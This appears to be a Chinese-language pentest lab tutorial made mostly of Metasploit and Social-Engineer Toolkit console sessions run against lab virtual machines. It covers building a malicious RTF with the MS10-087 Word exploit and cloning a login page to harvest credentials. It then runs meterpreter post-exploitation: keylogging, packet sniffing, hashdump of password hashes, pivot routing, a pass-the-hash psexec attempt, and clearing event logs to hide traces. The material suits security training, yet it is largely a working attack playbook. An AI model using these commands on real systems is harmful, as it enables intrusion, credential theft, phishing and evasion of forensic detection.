msf6 > search ms10_087
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great No MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec
payload => windows/exec
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe
CMD => calc.exe
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
FILENAME => ms10087.rtf
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
[*] Creating 'ms10087.rtf' file ...
[+] ms10087.rtf stored at C:/Users/IDEA/.msf4/local/ms10087.rtf
提示信息显示文件路径
C:/Users/IDEA/.msf4/local/ms10087.rtf
在系统中找到这个文件,将这个文件复制到WinXP Metasploitable靶机中双击打开,攻击目标被诱导打开文件
WinXP Metasploitable在双击后会打开payload中设置的计算器程序
社会工程学
钓鱼网站
http://10.10.10.129/signin.html
在Kali Linux中安装Set工具以用于仿造Web界面
apt-get -y install set
运行set
setoolkit
root@DESKTOP-9I2FBB4:~# setoolkit
________________________
__ ___/__ ____/__ __/
_____ \__ __/ __ /
____/ /_ /___ _ /
/____/ /_____/ /_/
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 8.0.3
Codename: 'Maverick'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
set>
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
选择1) Social-Engineering Attacks
1
提示信息
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
选择2) Website Attack Vectors
2
提示信息
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
99) Return to Main Menu
选择3) Credential Harvester Attack Method
3
提示信息
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
选择2) Site Cloner
2
提示信息
set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.10.10.128]:
提示信息
set:webattack> Enter the url to clone:
输入要克隆的URL
http://10.10.10.129/signin.html
set:webattack> Enter the url to clone:http://10.10.10.129/signin.html
[*] Cloning the website: http://10.10.10.129/signin.html
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
访问仿冒的URL
http://10.10.10.128/
提示信息
10.10.10.128 - - [17/Apr/2022 11:42:06] "GET / HTTP/1.1" 200 -
在仿冒的网页中输入用户名和口令
输入完成后会跳转到真实的地址
提示信息,获取到了在仿冒网页中输入的用户名和口令信息
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=admin
POSSIBLE USERNAME FIELD FOUND: Login=Login
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
后渗透攻击
Metasploit后渗透攻击模块主要支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。Metasploit位于后渗透攻击阶段主要利用post(后渗透模块)。
post(后渗透模块):拿到权后,进一步对目标和内网进行渗透。
信息窃取
dumplinks模块获取近期操作和访问记录
run post/windows/gather/dumplinks
meterpreter > run post/windows/gather/dumplinks
[*] Running module against DH-CA8822AB9589
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\0927.pdf.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\1.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Copy of kingview.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IIS6.CAB.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IIS_XPSP3.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\IMS.CAB.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\kingview.html.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KingView.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KVWebSvr.dll.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\msf.pdf.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document (2).txt.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document.txt (10).lnk.
enum_application模块获取安装软件、安全更新与漏洞补丁
run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on DH-CA8822AB9589
Installed Applications
======================
Name Version
---- -------
Adobe Reader 9 9.0.0
KingView 6.53 6.53
KingView Driver 6.53
Microsoft Office Standard Edition 2003 11.0.8173.0
Sentinel Protection Installer 7.5.0 7.5.0
VMware Tools 8.1.4.11056
WebFldrs XP 9.50.7523
[+] Results stored in: C:/Users/IDEA/.msf4/loot/20220417155003_default_192.168.10.128_host.application_916948.txt
keyscan获取键盘记录
keyscan_start
keyscan_dump
keyscan_stop
sniffer嗅探口令
use sniffer
sniffer_interfaces
sniffer_start 1
sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
sniffer_stop 1
meterpreter > use sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 8 packets (1174 bytes)
[*] Downloaded 100% (1174/1174)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to C:UsersIDEADownloadscap1.pcap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 0 packets (0 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
enum_ie模块获取缓存IE浏览器中的口令
run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/enum_ie
[*] IE Version: 6.0.2900.5512
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
[*] Retrieving cookies.....
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
hashdump获取系统密文口令
hashdump
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
内网拓展
获取路由
run get_local_subnets
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.10.0/255.255.255.0
后台session
background
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ DH-CA8822AB9589 192.168.10.1:24066 -> 192.168.10.128:5000 (192.168.10.128)
msf6 exploit(windows/smb/ms08_067_netapi) > sessions 1
[*] Starting interaction with 1...
meterpreter >
查看路由
route print
添加路由
route add 192.168.10.0 255.255.255.0 1
msf6 exploit(windows/smb/ms08_067_netapi) > route print
[*] There are currently no routes defined.
msf6 exploit(windows/smb/ms08_067_netapi) > route add 192.168.10.0 255.255.255.0 1
[*] Route added
msf6 exploit(windows/smb/ms08_067_netapi) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
192.168.10.0 255.255.255.0 Session 1
[*] There are currently no IPv6 routes defined.
口令利用
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set LHOST 10.10.10.128
set LPORT 443
set RHOST 192.168.10.128
set SMBUser Administrator
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
exploit
msf6 > use exploit/windows/smb/psexec
[*] Using configured payload windows/upexec/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf6 exploit(windows/smb/psexec) > set LPORT 443
LPORT => 443
msf6 exploit(windows/smb/psexec) > set RHOST 192.168.10.128
RHOST => 192.168.10.128
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(windows/smb/psexec) > exploit
[*] 192.168.10.128:445 - Connecting to the server...
[*] 192.168.10.128:445 - Authenticating to 192.168.10.128:445 as user 'Administrator'...
[-] 192.168.10.128:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.
掩踪灭迹
清除日志痕迹
clearev
meterpreter > clearev
[*] Wiping 327 records from Application...
[*] Wiping 518 records from System...
[*] Wiping 0 records from Security...
掩饰修改的文件时间戳
timestomp
iCTF
环境概览
环境名称 | 用途 | 备注 |
---|---|---|
iCTF 2011 Server | Linux靶机 | 下载vmware虚拟机镜像 |
环境下载
链接: https://pan.baidu.com/s/1KYRLKW1iRS-YfSoM-xlMdg?pwd=ju8g
提取码: ju8g
更多推荐
所有评论(0)